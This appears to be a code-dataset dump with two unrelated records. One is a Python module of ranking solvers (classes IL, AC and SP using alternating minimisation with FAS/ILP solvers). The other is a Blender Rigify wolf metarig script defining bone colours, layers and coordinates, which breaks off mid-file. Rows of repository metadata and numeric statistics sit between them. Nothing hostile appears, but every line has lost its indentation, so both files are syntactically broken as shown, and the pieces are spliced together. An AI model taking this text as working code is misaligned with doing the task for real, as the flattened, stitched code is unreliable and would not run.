|
f3fa6dbdf73431105d1097712dae0d23ec0ca37d
|
[
"MIT"
] | 5
|
2021-05-26T16:04:43.000Z
|
2021-08-05T13:52:17.000Z
|
problems/ranking/variational.py
|
VivienCabannes/infimum_loss
|
f3fa6dbdf73431105d1097712dae0d23ec0ca37d
|
[
"MIT"
] | null | null | null |
import numpy as np
from .fassolver import IlpSolver
class IL:
def __init__(self, computer, fas_solver=None):
self.computer = computer
self.solver = fas_solver
self.is_ilp = type(fas_solver) == IlpSolver
def train(self, x_train, S_train, **kwargs):
self.computer.set_support(x_train)
self.computer.train(**kwargs)
self.phi_init = S_train.astype(np.float)
self.const = self.phi_init
def __call__(self, x, tol=1e-3, solver=None, verbose=False):
if solver is None:
if self.solver is None:
raise ValueError('FAS solver has not been specified.')
solver = self.solver
alpha = self.computer(x)
# Because \ell(y, z) = - \phi(y)^\top \phi(z):
alpha *= -1
pred = np.empty((len(x), self.phi_init.shape[-1]), dtype=np.float)
phi_pl = np.empty(self.phi_init.shape, dtype=np.float)
for i in range(len(pred)):
# To stabilize CPLEX
alpha[i] /= np.abs(alpha[i]).max()
alpha[i] *= 1e3
# ------------------
self.solve(alpha[i], pred[i], phi_pl, tol, solver)
if verbose and not (100 * i) % len(x):
print(i, end=', ')
return pred
def solve(self, alpha, out, phi_pl, tol, solver):
# warmstart = [[] for i in range(len(phi_pl))]
is_ilp = type(solver) == IlpSolver
phi_pl[:] = self.phi_init[:]
if self.is_ilp:
self.solver.set_objective(alpha @ phi_pl)
out[:] = self.solver.solve()
else:
self.solver.solve_out(alpha @ phi_pl, out)
old_out = np.zeros(out.shape, dtype=np.float)
# Alternate minimization
while np.abs(out - old_out).max() > tol:
old_out[:] = out[:]
# Minimization of (y_i)_i
if is_ilp:
solver.set_objective(out)
for j in range(len(phi_pl)):
if alpha[j] > 0:
solver.set_constraints(self.const[j])
# if len(warmstart[j]):
# solver.set_warmstart(warmstart[j])
phi_pl[j] = solver.solve()
# warmstart[j] = solver.get_warmstart()
else:
phi_pl[j] = 0
out *= -1
solver.set_objective(out)
for j in range(len(phi_pl)):
if alpha[j] < 0:
solver.set_constraints(self.const[j])
# if len(warmstart[j]):
# solver.set_warmstart(warmstart[j])
phi_pl[j] = solver.solve()
# warmstart[j] = solver.get_warmstart()
else:
pre_sol_pos = solver.pre_solve(out)
out *= -1
pre_sol_neg = solver.pre_solve(out)
for j in range(len(phi_pl)):
if alpha[j] > 0:
solver.incorporate_const_out(pre_sol_pos, self.const[j], phi_pl[j])
elif alpha[j] < 0:
solver.incorporate_const_out(pre_sol_neg, self.const[j], phi_pl[j])
else:
phi_pl[j] = 0
# Minimization over z
if self.is_ilp:
self.solver.reset_constraints()
self.solver.set_objective(alpha @ phi_pl)
out[:] = self.solver.solve()
else:
self.solver.solve_out(alpha @ phi_pl, out)
class AC:
def __init__(self, computer, fas_solver):
self.computer = computer
self.solver = fas_solver
self.is_ilp = type(fas_solver) == IlpSolver
def train(self, x_train, S_train, lambd, num=1, K_inv=None):
self.computer.set_support(x_train)
self.computer.train(lambd=lambd)
phi = self.get_center(S_train, num, self.solver)
self.computer.set_phi(phi)
def __call__(self, x, verbose=False):
c = self.computer.call_with_phi(x)
c *= -1
pred = np.empty(c.shape, dtype=np.float)
for i in range(len(x)):
if self.is_ilp:
self.solver.set_objective(c[i])
pred[i] = self.solver.solve()
else:
self.solver.solve_out(c[i], pred[i])
if verbose and not (100 * i) % len(x):
print(i, end=", ")
return pred
@staticmethod
def get_center(S_train, num, solver):
is_ilp = type(solver) == IlpSolver
phi = np.empty(S_train.shape)
tmp = np.empty((num, S_train.shape[1]))
for i in range(len(phi)):
tmp[:] = 0
ctl = num
for j in range(num):
c = np.random.randn(S_train.shape[1])
if is_ilp:
solver.set_constraints(S_train[i])
solver.set_objective(c)
tmp[j] = solver.solve()
else:
tmp[j] += solver.solve_const(c, S_train[i])
if j:
if (tmp[:j] == tmp[j]).mean(axis=1).max() == 1:
tmp[j] = 0
ctl -= 1
phi[i] = tmp.sum(axis=0) / ctl
if is_ilp:
solver.reset_constraints()
return phi
class SP:
def __init__(self, computer, fas_solver):
self.computer = computer
self.solver = fas_solver
self.is_ilp = type(fas_solver) == IlpSolver
def train(self, x_train, S_train, **kwargs):
self.computer.set_support(x_train)
self.computer.train(**kwargs)
self.phi_init = S_train.astype(np.float)
self.const = self.phi_init
def __call__(self, x, tol=1e-10, solver=None, verbose=False):
if solver is None:
if self.solver is None:
raise ValueError('FAS solver has not been specified.')
solver = self.solver
alpha = self.computer(x)
alpha *= -1
pred = np.empty((len(x), self.phi_init.shape[-1]), dtype=np.float)
phi_pl = np.empty(self.phi_init.shape, dtype=np.float)
for i in range(len(pred)):
self.solve(alpha[i], pred[i], phi_pl, tol, solver)
if verbose and not (100 * i) % len(x):
print(i, end=", ")
return pred
def solve(self, alpha, out, phi_pl, tol, solver):
# warmstart = [[] for i in range(len(phi_pl))]
is_ilp = type(solver) == IlpSolver
phi_pl[:] = self.phi_init[:]
if self.is_ilp:
self.solver.set_objective(alpha @ phi_pl)
out[:] = self.solver.solve()
else:
self.solver.solve_out(alpha @ phi_pl, out)
old_out = np.zeros(out.shape, dtype=np.float)
# Alternate minimization
ctl = 0
while np.abs(out - old_out).max() > tol and ctl < 100:
ctl += 1
old_out[:] = out[:]
# Minimization of (y_i)_i
if is_ilp:
solver.set_objective(out)
for j in range(len(phi_pl)):
if alpha[j] < 0:
solver.set_constraints(self.const[j])
# if len(warmstart[j]):
# solver.set_warmstart(warmstart[j])
phi_pl[j] = solver.solve()
# warmstart[j] = solver.get_warmstart()
else:
phi_pl[j] = 0
out *= -1
solver.set_objective(out)
for j in range(len(phi_pl)):
if alpha[j] > 0:
solver.set_constraints(self.const[j])
# if len(warmstart[j]):
# solver.set_warmstart(warmstart[j])
phi_pl[j] = solver.solve()
# warmstart[j] = solver.get_warmstart()
else:
pre_sol_pos = solver.pre_solve(out)
out *= -1
pre_sol_neg = solver.pre_solve(out)
for j in range(len(phi_pl)):
if alpha[j] < 0:
solver.incorporate_const_out(pre_sol_pos, self.const[j], phi_pl[j])
elif alpha[j] > 0:
solver.incorporate_const_out(pre_sol_neg, self.const[j], phi_pl[j])
else:
phi_pl[j] = 0
# Minimization over z
if self.is_ilp:
self.solver.reset_constraints()
self.solver.set_objective(alpha @ phi_pl)
out[:] = self.solver.solve()
else:
self.solver.solve_out(alpha @ phi_pl, out)
| 36.42562
| 91
| 0.490414
| 1,083
| 8,815
| 3.815328
| 0.102493
| 0.043562
| 0.029042
| 0.028316
| 0.857696
| 0.845111
| 0.827686
| 0.827686
| 0.798645
| 0.780252
| 0
| 0.009517
| 0.392059
| 8,815
| 241
| 92
| 36.576763
| 0.761523
| 0.114124
| 0
| 0.735135
| 0
| 0
| 0.009507
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064865
| false
| 0
| 0.010811
| 0
| 0.113514
| 0.016216
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1a8ea5495e6f54141a21ddd0c921bf5677e7575
| 172,316
|
py
|
Python
|
blender/2.79/scripts/addons/rigify/metarigs/Animals/wolf.py
|
uzairakbar/bpy2.79
|
3a3e0004ac6783c4e4b89d939e4432de99026a85
|
[
"MIT"
] | 2
|
2019-11-27T09:05:42.000Z
|
2020-02-20T01:25:23.000Z
|
rigify/metarigs/Animals/wolf.py
|
1-MillionParanoidTterabytes/blender-addons-master
|
acc8fc23a38e6e89099c3e5079bea31ce85da06a
|
[
"Unlicense"
] | null | null | null |
rigify/metarigs/Animals/wolf.py
|
1-MillionParanoidTterabytes/blender-addons-master
|
acc8fc23a38e6e89099c3e5079bea31ce85da06a
|
[
"Unlicense"
] | 4
|
2020-02-19T20:02:26.000Z
|
2022-02-11T18:47:56.000Z
|
import bpy
from mathutils import Color
def create(obj):
# generated by rigify.utils.write_metarig
bpy.ops.object.mode_set(mode='EDIT')
arm = obj.data
for i in range(6):
arm.rigify_colors.add()
arm.rigify_colors[0].name = "Root"
arm.rigify_colors[0].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[0].normal = Color((0.4352940022945404, 0.18431399762630463, 0.4156860113143921))
arm.rigify_colors[0].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[0].standard_colors_lock = True
arm.rigify_colors[1].name = "IK"
arm.rigify_colors[1].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[1].normal = Color((0.6039220094680786, 0.0, 0.0))
arm.rigify_colors[1].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[1].standard_colors_lock = True
arm.rigify_colors[2].name = "Special"
arm.rigify_colors[2].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[2].normal = Color((0.9568629860877991, 0.7882350087165833, 0.04705899953842163))
arm.rigify_colors[2].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[2].standard_colors_lock = True
arm.rigify_colors[3].name = "Tweak"
arm.rigify_colors[3].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[3].normal = Color((0.03921600058674812, 0.21176500618457794, 0.5803920030593872))
arm.rigify_colors[3].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[3].standard_colors_lock = True
arm.rigify_colors[4].name = "FK"
arm.rigify_colors[4].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[4].normal = Color((0.11764699965715408, 0.5686269998550415, 0.035294000059366226))
arm.rigify_colors[4].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[4].standard_colors_lock = True
arm.rigify_colors[5].name = "Extra"
arm.rigify_colors[5].active = Color((0.5490196347236633, 1.0, 1.0))
arm.rigify_colors[5].normal = Color((0.9686279892921448, 0.2509799897670746, 0.09411799907684326))
arm.rigify_colors[5].select = Color((0.31372547149658203, 0.7843138575553894, 1.0))
arm.rigify_colors[5].standard_colors_lock = True
for i in range(29):
arm.rigify_layers.add()
arm.rigify_layers[0].name = "Face"
arm.rigify_layers[0].row = 1
arm.rigify_layers[0].set = False
arm.rigify_layers[0].group = 5
arm.rigify_layers[1].name = "Face (Primary)"
arm.rigify_layers[1].row = 2
arm.rigify_layers[1].set = False
arm.rigify_layers[1].group = 2
arm.rigify_layers[2].name = "Face (Secondary)"
arm.rigify_layers[2].row = 2
arm.rigify_layers[2].set = False
arm.rigify_layers[2].group = 3
arm.rigify_layers[3].name = "Spine"
arm.rigify_layers[3].row = 3
arm.rigify_layers[3].set = False
arm.rigify_layers[3].group = 3
arm.rigify_layers[4].name = "Spine (Tweak)"
arm.rigify_layers[4].row = 4
arm.rigify_layers[4].set = False
arm.rigify_layers[4].group = 4
arm.rigify_layers[5].name = "Paws"
arm.rigify_layers[5].row = 5
arm.rigify_layers[5].set = False
arm.rigify_layers[5].group = 6
arm.rigify_layers[6].name = "Paws (Tweak)"
arm.rigify_layers[6].row = 6
arm.rigify_layers[6].set = False
arm.rigify_layers[6].group = 4
arm.rigify_layers[7].name = "Arm.L (IK)"
arm.rigify_layers[7].row = 7
arm.rigify_layers[7].set = False
arm.rigify_layers[7].group = 2
arm.rigify_layers[8].name = "Arm.L (FK)"
arm.rigify_layers[8].row = 8
arm.rigify_layers[8].set = False
arm.rigify_layers[8].group = 5
arm.rigify_layers[9].name = "Arm.L (Tweak)"
arm.rigify_layers[9].row = 9
arm.rigify_layers[9].set = False
arm.rigify_layers[9].group = 4
arm.rigify_layers[10].name = "Arm.R (IK)"
arm.rigify_layers[10].row = 7
arm.rigify_layers[10].set = False
arm.rigify_layers[10].group = 2
arm.rigify_layers[11].name = "Arm.R (FK)"
arm.rigify_layers[11].row = 8
arm.rigify_layers[11].set = False
arm.rigify_layers[11].group = 5
arm.rigify_layers[12].name = "Arm.R (Tweak)"
arm.rigify_layers[12].row = 9
arm.rigify_layers[12].set = False
arm.rigify_layers[12].group = 4
arm.rigify_layers[13].name = "Leg.L (IK)"
arm.rigify_layers[13].row = 10
arm.rigify_layers[13].set = False
arm.rigify_layers[13].group = 2
arm.rigify_layers[14].name = "Leg.L (FK)"
arm.rigify_layers[14].row = 11
arm.rigify_layers[14].set = False
arm.rigify_layers[14].group = 5
arm.rigify_layers[15].name = "Leg.L (Tweak)"
arm.rigify_layers[15].row = 12
arm.rigify_layers[15].set = False
arm.rigify_layers[15].group = 4
arm.rigify_layers[16].name = "Leg.R (IK)"
arm.rigify_layers[16].row = 10
arm.rigify_layers[16].set = False
arm.rigify_layers[16].group = 2
arm.rigify_layers[17].name = "Leg.R (FK)"
arm.rigify_layers[17].row = 11
arm.rigify_layers[17].set = False
arm.rigify_layers[17].group = 5
arm.rigify_layers[18].name = "Leg.R (Tweak)"
arm.rigify_layers[18].row = 12
arm.rigify_layers[18].set = False
arm.rigify_layers[18].group = 4
arm.rigify_layers[19].name = "Tail"
arm.rigify_layers[19].row = 13
arm.rigify_layers[19].set = False
arm.rigify_layers[19].group = 6
arm.rigify_layers[20].name = ""
arm.rigify_layers[20].row = 1
arm.rigify_layers[20].set = False
arm.rigify_layers[20].group = 0
arm.rigify_layers[21].name = ""
arm.rigify_layers[21].row = 13
arm.rigify_layers[21].set = False
arm.rigify_layers[21].group = 0
arm.rigify_layers[22].name = ""
arm.rigify_layers[22].row = 13
arm.rigify_layers[22].set = False
arm.rigify_layers[22].group = 0
arm.rigify_layers[23].name = ""
arm.rigify_layers[23].row = 1
arm.rigify_layers[23].set = False
arm.rigify_layers[23].group = 0
arm.rigify_layers[24].name = ""
arm.rigify_layers[24].row = 1
arm.rigify_layers[24].set = False
arm.rigify_layers[24].group = 0
arm.rigify_layers[25].name = ""
arm.rigify_layers[25].row = 1
arm.rigify_layers[25].set = False
arm.rigify_layers[25].group = 0
arm.rigify_layers[26].name = ""
arm.rigify_layers[26].row = 1
arm.rigify_layers[26].set = False
arm.rigify_layers[26].group = 0
arm.rigify_layers[27].name = ""
arm.rigify_layers[27].row = 1
arm.rigify_layers[27].set = False
arm.rigify_layers[27].group = 0
arm.rigify_layers[28].name = "Root"
arm.rigify_layers[28].row = 14
arm.rigify_layers[28].set = False
arm.rigify_layers[28].group = 1
bones = {}
bone = arm.edit_bones.new('spine')
bone.head[:] = 0.0000, 1.1044, 0.7633
bone.tail[:] = 0.0000, 0.9624, 0.7412
bone.roll = 0.0000
bone.use_connect = False
bones['spine'] = bone.name
bone = arm.edit_bones.new('spine.001')
bone.head[:] = 0.0000, 0.9624, 0.7412
bone.tail[:] = 0.0000, 0.7755, 0.7418
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine']]
bones['spine.001'] = bone.name
bone = arm.edit_bones.new('spine.002')
bone.head[:] = 0.0000, 0.7755, 0.7418
bone.tail[:] = 0.0000, 0.5547, 0.7568
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.001']]
bones['spine.002'] = bone.name
bone = arm.edit_bones.new('spine.003')
bone.head[:] = 0.0000, 0.5547, 0.7568
bone.tail[:] = 0.0000, 0.4418, 0.7954
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.002']]
bones['spine.003'] = bone.name
bone = arm.edit_bones.new('spine.004')
bone.head[:] = 0.0000, 0.4418, 0.7954
bone.tail[:] = 0.0000, 0.3546, 0.8059
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.003']]
bones['spine.004'] = bone.name
bone = arm.edit_bones.new('spine.005')
bone.head[:] = 0.0000, 0.3546, 0.8059
bone.tail[:] = 0.0000, 0.1803, 0.7782
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.004']]
bones['spine.005'] = bone.name
bone = arm.edit_bones.new('spine.006')
bone.head[:] = 0.0000, 0.1803, 0.7782
bone.tail[:] = 0.0000, 0.0319, 0.7731
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.005']]
bones['spine.006'] = bone.name
bone = arm.edit_bones.new('pelvis.L')
bone.head[:] = 0.0000, 0.3757, 0.6043
bone.tail[:] = 0.0751, 0.2755, 0.8544
bone.roll = -1.5841
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
bones['pelvis.L'] = bone.name
bone = arm.edit_bones.new('pelvis.R')
bone.head[:] = -0.0000, 0.3757, 0.6043
bone.tail[:] = -0.0751, 0.2755, 0.8544
bone.roll = 1.5841
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
bones['pelvis.R'] = bone.name
bone = arm.edit_bones.new('thigh.L')
bone.head[:] = 0.1249, 0.3419, 0.7379
bone.tail[:] = 0.1249, 0.2712, 0.4731
bone.roll = -0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
bones['thigh.L'] = bone.name
bone = arm.edit_bones.new('thigh.R')
bone.head[:] = -0.1249, 0.3419, 0.7379
bone.tail[:] = -0.1249, 0.2712, 0.4731
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.005']]
bones['thigh.R'] = bone.name
bone = arm.edit_bones.new('spine.007')
bone.head[:] = 0.0000, 0.0319, 0.7731
bone.tail[:] = 0.0000, -0.0980, 0.7945
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.006']]
bones['spine.007'] = bone.name
bone = arm.edit_bones.new('shin.L')
bone.head[:] = 0.1249, 0.2712, 0.4731
bone.tail[:] = 0.1114, 0.4766, 0.2473
bone.roll = 0.0195
bone.use_connect = True
bone.parent = arm.edit_bones[bones['thigh.L']]
bones['shin.L'] = bone.name
bone = arm.edit_bones.new('shin.R')
bone.head[:] = -0.1249, 0.2712, 0.4731
bone.tail[:] = -0.1114, 0.4766, 0.2473
bone.roll = -0.0195
bone.use_connect = True
bone.parent = arm.edit_bones[bones['thigh.R']]
bones['shin.R'] = bone.name
bone = arm.edit_bones.new('spine.008')
bone.head[:] = 0.0000, -0.0980, 0.7945
bone.tail[:] = 0.0000, -0.3618, 0.8375
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.007']]
bones['spine.008'] = bone.name
bone = arm.edit_bones.new('foot.L')
bone.head[:] = 0.1114, 0.4766, 0.2473
bone.tail[:] = 0.1088, 0.4138, 0.0411
bone.roll = 0.0165
bone.use_connect = True
bone.parent = arm.edit_bones[bones['shin.L']]
bones['foot.L'] = bone.name
bone = arm.edit_bones.new('foot.R')
bone.head[:] = -0.1114, 0.4766, 0.2473
bone.tail[:] = -0.1088, 0.4138, 0.0411
bone.roll = -0.0165
bone.use_connect = True
bone.parent = arm.edit_bones[bones['shin.R']]
bones['foot.R'] = bone.name
bone = arm.edit_bones.new('spine.009')
bone.head[:] = 0.0000, -0.3618, 0.8375
bone.tail[:] = 0.0000, -0.4253, 0.8585
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.008']]
bones['spine.009'] = bone.name
bone = arm.edit_bones.new('shoulder.L')
bone.head[:] = 0.0596, -0.2578, 0.8876
bone.tail[:] = 0.1249, -0.3418, 0.7153
bone.roll = -0.3526
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.008']]
bones['shoulder.L'] = bone.name
bone = arm.edit_bones.new('shoulder.R')
bone.head[:] = -0.0596, -0.2578, 0.8876
bone.tail[:] = -0.1249, -0.3418, 0.7153
bone.roll = 0.3526
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.008']]
bones['shoulder.R'] = bone.name
bone = arm.edit_bones.new('breast.L')
bone.head[:] = 0.0340, -0.1694, 0.6676
bone.tail[:] = 0.0340, -0.3139, 0.5296
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.008']]
bones['breast.L'] = bone.name
bone = arm.edit_bones.new('breast.R')
bone.head[:] = -0.0340, -0.1694, 0.6676
bone.tail[:] = -0.0340, -0.3139, 0.5296
bone.roll = -0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.008']]
bones['breast.R'] = bone.name
bone = arm.edit_bones.new('toe.L')
bone.head[:] = 0.1088, 0.4138, 0.0411
bone.tail[:] = 0.1088, 0.3213, 0.0000
bone.roll = 3.1416
bone.use_connect = True
bone.parent = arm.edit_bones[bones['foot.L']]
bones['toe.L'] = bone.name
bone = arm.edit_bones.new('toe.R')
bone.head[:] = -0.1088, 0.4138, 0.0411
bone.tail[:] = -0.1088, 0.3213, 0.0000
bone.roll = -3.1416
bone.use_connect = True
bone.parent = arm.edit_bones[bones['foot.R']]
bones['toe.R'] = bone.name
bone = arm.edit_bones.new('spine.010')
bone.head[:] = 0.0000, -0.4253, 0.8585
bone.tail[:] = 0.0000, -0.4888, 0.8796
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.009']]
bones['spine.010'] = bone.name
bone = arm.edit_bones.new('front_thigh.L')
bone.head[:] = 0.1249, -0.3161, 0.6902
bone.tail[:] = 0.1249, -0.2245, 0.4418
bone.roll = -0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['shoulder.L']]
bones['front_thigh.L'] = bone.name
bone = arm.edit_bones.new('front_thigh.R')
bone.head[:] = -0.1249, -0.3161, 0.6902
bone.tail[:] = -0.1249, -0.2245, 0.4418
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['shoulder.R']]
bones['front_thigh.R'] = bone.name
bone = arm.edit_bones.new('r_palm.04.L')
bone.head[:] = 0.1140, 0.4168, 0.0282
bone.tail[:] = 0.1337, 0.3749, 0.0253
bone.roll = -2.8623
bone.use_connect = False
bone.parent = arm.edit_bones[bones['toe.L']]
bones['r_palm.04.L'] = bone.name
bone = arm.edit_bones.new('r_palm.03.L')
bone.head[:] = 0.1053, 0.4151, 0.0282
bone.tail[:] = 0.1150, 0.3664, 0.0377
bone.roll = 1.5833
bone.use_connect = False
bone.parent = arm.edit_bones[bones['toe.L']]
bones['r_palm.03.L'] = bone.name
bone = arm.edit_bones.new('r_palm.02.L')
bone.head[:] = 0.0964, 0.4152, 0.0282
bone.tail[:] = 0.0894, 0.3664, 0.0377
bone.roll = -1.2317
bone.use_connect = False
bone.parent = arm.edit_bones[bones['toe.L']]
bones['r_palm.02.L'] = bone.name
bone = arm.edit_bones.new('r_palm.01.L')
bone.head[:] = 0.0845, 0.4178, 0.0282
bone.tail[:] = 0.0702, 0.3781, 0.0253
bone.roll = 2.8333
bone.use_connect = False
bone.parent = arm.edit_bones[bones['toe.L']]
bones['r_palm.01.L'] = bone.name
bone = arm.edit_bones.new('r_palm.04.R')
bone.head[:] = -0.1140, 0.4168, 0.0282
bone.tail[:] = -0.1337, 0.3749, 0.0253
bone.roll = 2.8623
bone.use_connect = False
bone.parent = arm.edit_bones[bones['toe.R']]
bones['r_palm.04.R'] = bone.name
bone = arm.edit_bones.new('r_palm.03.R')
bone.head[:] = -0.1053, 0.4151, 0.0282
bone.tail[:] = -0.1150, 0.3664, 0.0377
bone.roll = -1.5833
bone.use_connect = False
bone.parent = arm.edit_bones[bones['toe.R']]
bones['r_palm.03.R'] = bone.name
bone = arm.edit_bones.new('r_palm.02.R')
bone.head[:] = -0.0964, 0.4152, 0.0282
bone.tail[:] = -0.0894, 0.3664, 0.0377
bone.roll = 1.2317
bone.use_connect = False
bone.parent = arm.edit_bones[bones['toe.R']]
bones['r_palm.02.R'] = bone.name
bone = arm.edit_bones.new('r_palm.01.R')
bone.head[:] = -0.0845, 0.4178, 0.0282
bone.tail[:] = -0.0702, 0.3781, 0.0253
bone.roll = -2.8333
bone.use_connect = False
bone.parent = arm.edit_bones[bones['toe.R']]
bones['r_palm.01.R'] = bone.name
bone = arm.edit_bones.new('spine.011')
bone.head[:] = 0.0000, -0.4888, 0.8796
bone.tail[:] = 0.0000, -0.6590, 0.9809
bone.roll = 0.0000
bone.use_connect = True
bone.parent = arm.edit_bones[bones['spine.010']]
bones['spine.011'] = bone.name
bone = arm.edit_bones.new('front_shin.L')
bone.head[:] = 0.1249, -0.2245, 0.4418
bone.tail[:] = 0.1114, -0.2147, 0.1698
bone.roll = 0.0098
bone.use_connect = True
bone.parent = arm.edit_bones[bones['front_thigh.L']]
bones['front_shin.L'] = bone.name
bone = arm.edit_bones.new('front_shin.R')
bone.head[:] = -0.1249, -0.2245, 0.4418
bone.tail[:] = -0.1114, -0.2147, 0.1698
bone.roll = -0.0098
bone.use_connect = True
bone.parent = arm.edit_bones[bones['front_thigh.R']]
bones['front_shin.R'] = bone.name
bone = arm.edit_bones.new('r_pinky.01.L')
bone.head[:] = 0.1337, 0.3749, 0.0253
bone.tail[:] = 0.1388, 0.3551, 0.0222
bone.roll = -2.0928
bone.use_connect = False
bone.parent = arm.edit_bones[bones['r_palm.04.L']]
bones['r_pinky.01.L'] = bone.name
bone = arm.edit_bones.new('r_ring.01.L')
bone.head[:] = 0.1150, 0.3664, 0.0377
bone.tail[:] = 0.1166, 0.3467, 0.0317
bone.roll = -0.5451
bone.use_connect = False
bone.parent = arm.edit_bones[bones['r_palm.03.L']]
bones['r_ring.01.L'] = bone.name
bone = arm.edit_bones.new('r_middle.01.L')
bone.head[:] = 0.0894, 0.3664, 0.0377
bone.tail[:] = 0.0866, 0.3467, 0.0317
bone.roll = 0.9401
bone.use_connect = False
bone.parent = arm.edit_bones[bones['r_palm.02.L']]
bones['r_middle.01.L'] = bone.name
bone = arm.edit_bones.new('r_index.01.L')
bone.head[:] = 0.0702, 0.3781, 0.0253
bone.tail[:] = 0.0660, 0.3581, 0.0222
bone.roll = 1.9945
bone.use_connect = False
bone.parent = arm.edit_bones[bones['r_palm.01.L']]
bones['r_index.01.L'] = bone.name
bone = arm.edit_bones.new('r_pinky.01.R')
bone.head[:] = -0.1337, 0.3749, 0.0253
bone.tail[:] = -0.1388, 0.3551, 0.0222
bone.roll = 2.0928
bone.use_connect = False
bone.parent = arm.edit_bones[bones['r_palm.04.R']]
bones['r_pinky.01.R'] = bone.name
bone = arm.edit_bones.new('r_ring.01.R')
bone.head[:] = -0.1150, 0.3664, 0.0377
bone.tail[:] = -0.1166, 0.3467, 0.0317
bone.roll = 0.5451
bone.use_connect = False
bone.parent = arm.edit_bones[bones['r_palm.03.R']]
bones['r_ring.01.R'] = bone.name
bone = arm.edit_bones.new('r_middle.01.R')
bone.head[:] = -0.0894, 0.3664, 0.0377
bone.tail[:] = -0.0866, 0.3467, 0.0317
bone.roll = -0.9401
bone.use_connect = False
bone.parent = arm.edit_bones[bones['r_palm.02.R']]
bones['r_middle.01.R'] = bone.name
bone = arm.edit_bones.new('r_index.01.R')
bone.head[:] = -0.0702, 0.3781, 0.0253
bone.tail[:] = -0.0660, 0.3581, 0.0222
bone.roll = -1.9945
bone.use_connect = False
bone.parent = arm.edit_bones[bones['r_palm.01.R']]
bones['r_index.01.R'] = bone.name
bone = arm.edit_bones.new('face')
bone.head[:] = -0.0000, -0.6484, 0.8273
bone.tail[:] = -0.0000, -0.6484, 0.8890
bone.roll = 0.0000
bone.use_connect = False
bone.parent = arm.edit_bones[bones['spine.011']]
bones['face'] = bone.name
bone = arm.edit_bones.new('front_foot.L')
bone.head[:] = 0.1114, -0.2147, 0.1698
bone.tail[:] = 0.1088, -0.2462, 0.0411
bone.roll = 0.0272
bone.use_connect = True
bone.parent = arm.edit_bones[bones['front_shin.L']]
bones['front_foot.L'] = bone.name
bone = arm.edit_bones.new('front_foot.R')
bone.head[:] = -0.1114, -0.2147, 0.1698
bone.tail[:] = -0.1088, -0.2462, 0.0411
bone.roll = -0.0272
bone.use_connect = True
bone.parent = arm.edit_bones[bones['front_shin.R']]
bones['front_foot.R'] = bone.name
bone = arm.edit_bones.new('r_pinky.02.L')
bone.head[:] = 0.1388, 0.3551, 0.0222
bone.tail[:] = 0.1431, 0.3382, 0.0170
bone.roll = -1.4292
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_pinky.01.L']]
bones['r_pinky.02.L'] = bone.name
bone = arm.edit_bones.new('r_ring.02.L')
bone.head[:] = 0.1166, 0.3467, 0.0317
bone.tail[:] = 0.1188, 0.3297, 0.0224
bone.roll = -0.5100
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_ring.01.L']]
bones['r_ring.02.L'] = bone.name
bone = arm.edit_bones.new('r_middle.02.L')
bone.head[:] = 0.0866, 0.3467, 0.0317
bone.tail[:] = 0.0851, 0.3297, 0.0224
bone.roll = 0.4076
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_middle.01.L']]
bones['r_middle.02.L'] = bone.name
bone = arm.edit_bones.new('r_index.02.L')
bone.head[:] = 0.0660, 0.3581, 0.0222
bone.tail[:] = 0.0623, 0.3410, 0.0170
bone.roll = 1.3847
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_index.01.L']]
bones['r_index.02.L'] = bone.name
bone = arm.edit_bones.new('r_pinky.02.R')
bone.head[:] = -0.1388, 0.3551, 0.0222
bone.tail[:] = -0.1431, 0.3382, 0.0170
bone.roll = 1.4292
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_pinky.01.R']]
bones['r_pinky.02.R'] = bone.name
bone = arm.edit_bones.new('r_ring.02.R')
bone.head[:] = -0.1166, 0.3467, 0.0317
bone.tail[:] = -0.1188, 0.3297, 0.0224
bone.roll = 0.5100
bone.use_connect = True
bone.parent = arm.edit_bones[bones['r_ring.01.R']]
bones['r_ring.02.R'] = bone.name
